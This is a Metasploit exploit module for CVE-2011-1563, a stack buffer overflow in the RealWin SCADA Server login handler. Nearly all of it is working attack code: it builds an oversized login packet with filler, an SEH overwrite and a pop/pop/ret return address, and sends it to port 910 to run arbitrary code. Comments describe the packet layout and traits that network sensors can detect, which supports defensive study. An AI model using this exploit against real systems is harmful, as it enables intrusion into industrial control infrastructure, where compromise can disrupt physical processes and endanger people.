Path: blob/master/modules/exploits/windows/scada/realwin_on_fcs_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2011-1563: a stack buffer overflow in the
# On_FC_CONNECT_FCS_LOGIN handler of DATAC RealWin SCADA Server.
# The overflow is reached through an overlong username field and is
# converted into code execution via an SEH overwrite (see the Seh
# mixin and the 'Offset' / 'Ret' target values below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Tcp supplies connect / sock / disconnect; Seh supplies
  # generate_seh_payload.
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  # Module metadata. The only registered option is RPORT, which
  # defaults to 910, the port the RealWin server listens on.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealWin SCADA Server DATAC Login Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in DATAC Control
        International RealWin SCADA Server 2.1 (Build 6.0.10.10) or
        earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN
        packet containing a long username, an attacker may be able to
        execute arbitrary code.
      },
      'Author'         =>
        [
          'Luigi Auriemma', # discovery
          'MC',
          'B|H <bh[AT]bufferattack.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1563'],
          [ 'OSVDB', '72824'],
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],
          [ 'URL', 'http://www.dataconline.com/software/realwin.php' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']
        ],
      # 'Privileged' => true marks the exploited process as running with
      # elevated privileges, which the payload then inherits.
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 450,
          # NUL, space, LF and CR must not appear in the encoded payload.
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Universal',
            {
              'Offset' => 392,        # bytes of filler before the SEH record
              'Ret'    => 0x40012540, # pop/pop/ret @FlexMLang.dll
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2011-03-21'))

    register_options([Opt::RPORT(910)])
  end

  # Builds the malformed login packet and sends it in one write.
  # Layout, with every multi-byte word little-endian ('V'):
  #   three 4-byte header words, a 2-byte field, target['Offset'] bytes
  #   of random upper-case filler, the SEH record / payload produced by
  #   the Seh mixin, a second run of filler sized against the encoded
  #   payload length, then three trailing 4-byte words.
  # The constant header and trailer words, the destination port and the
  # unusually large login packet are the stable characteristics a
  # network sensor can match on.
  def exploit
    data = [0x67542310].pack('V')
    data << [0x00000824].pack('V')
    data << [0x00110011].pack('V')
    data << "\x01\x00"
    # Filler up to the SEH record (target['Offset'] is 392 above).
    data << rand_text_alpha_upper(target['Offset'])
    data << generate_seh_payload(target.ret)
    # Filler that shrinks as the encoded payload grows; presumably keeps
    # the overall packet length constant (depends on what
    # generate_seh_payload emits — not visible here).
    data << rand_text_alpha_upper(17706 - payload.encoded.length)
    data << [0x451c3500].pack('V')
    data << [0x00000154].pack('V')
    data << [0x00020040].pack('V')

    connect
    print_status("Trying target #{target.name}...")
    sock.put(data)
    # Kernel#select with only a timeout: a 0.5 s pause so the service
    # can process the packet before the handler starts and the socket
    # is closed.
    select(nil,nil,nil,0.5)
    handler
    disconnect
  end
end